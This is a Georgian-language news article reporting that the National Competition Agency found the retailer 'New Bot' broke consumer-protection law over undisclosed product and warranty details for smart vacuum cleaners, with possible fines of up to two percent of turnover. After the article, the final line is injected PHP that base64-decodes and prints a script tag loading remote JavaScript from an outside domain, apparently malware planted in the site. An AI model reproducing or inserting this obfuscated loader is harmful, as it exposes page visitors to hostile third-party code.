celsiusi
ავერსი საქკაბელი
საქართველოს კონკურენციის ეროვნულმა სააგენტომ „ნიუ ბოტის“ მხრიდან „მომხმარებლის უფლებების დაცვის შესახებ“ საქართველოს კანონის სავარაუდო დარღვევის ფაქტზე საქმის შესწავლა დაასრულა.
როგორც უწყების მიერ გავრცელებულ ინფორმაციაშია ნათქვამი, საქმის გარემოებებისა და წარმოდგენილი მტკიცებულებების შეფასების, შესწავლის შედეგად, შპს „ნიუ ბოტის“ მიერ „მომხმარებლის უფლებების დაცვის შესახებ“ საქართველოს კანონის დარღვევის ფაქტი დადგინდა. კერძოდ, სააგენტოს გადაწყვეტილებით, მოვაჭრის მხრიდან მომხმარებლისთვის ინფორმაციის მიწოდების ძირითადი ვალდებულებისა და დისტანციურ ხელშეკრულებაზე ან/და სარეწის გარეთ დადებულ ხელშეკრულებაზე უარის თქმის უფლების დარღვევის ფაქტი დადასტურდა. შესაბამისად, მოვაჭრეს დაევალა, ერთი თვის ვადაში მომხმარებელთა დარღვეული უფლებები აღადგინოს და თავისი სავაჭრო პოლიტიკა კანონის შესაბამისი მუხლების მოთხოვნებს შეუსაბამოს.
„საქმესთან დაკავშირებით, სააგენტოს განცხადებით სამმა განმცხადებელმა მომართა, სადაც აღნიშნული იყო, რომ მოვაჭრისგან დისტანციურად ე.წ. ჭკვიანი მტვერსასრუტი შეიძინეს, თუმცა შეძენილი საქონელი მოთხოვნებს ვერ აკმაყოფილებდა. მომხმარებლები მიუთითებდნენ, რომ საქონლის შეძენამდე მოვაჭრეს ინფორმაცია საქონლის მახასიათებლების თაობაზე არ მიუწოდებია, ასევე მათ არ ჰქონიათ ინფორმაცია საგარანტიო სერვისისა და პირობების სარგებლობის თაობაზე.
კანონმდებლობის შესაბამისად, სააგენტოს გადაწყვეტილების დადგენილ ვადაში შეუსრულებლობის ან არაჯეროვნად შესრულების შემთხვევაში, მოვაჭრეს ჯარიმა ეკისრება. ჯარიმის ოდენობა არ უნდა აღემატებოდეს მოვაჭრის წინა ფინანსური წლის წლიური ბრუნვის ორ პროცენტს. 12 თვის განმავლობაში მოვაჭრის მიერ დარღვევის გამეორება გამოიწვევს დაკისრებული ჯარიმის გაორმაგებას. სააგენტოს გადაწყვეტილება შეიძლება, გასაჩივრდეს სასამართლოში“, – აღნიშნულია კონკურენციის ეროვნული სააგენტოს ინფორმაციაში.
უწყების ცნობით, 2022 წლის პირველი ნოემბრიდან დღემდე სააგენტოში შესულია სულ 110 განაცხადი. საქმის შესწავლა 60 ქეისზე დაწყებულია. მომხმარებლის სასარგებლოდ გაფორმდა 11 პირობითი ვალდებულების ხელშეკრულება.
410
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");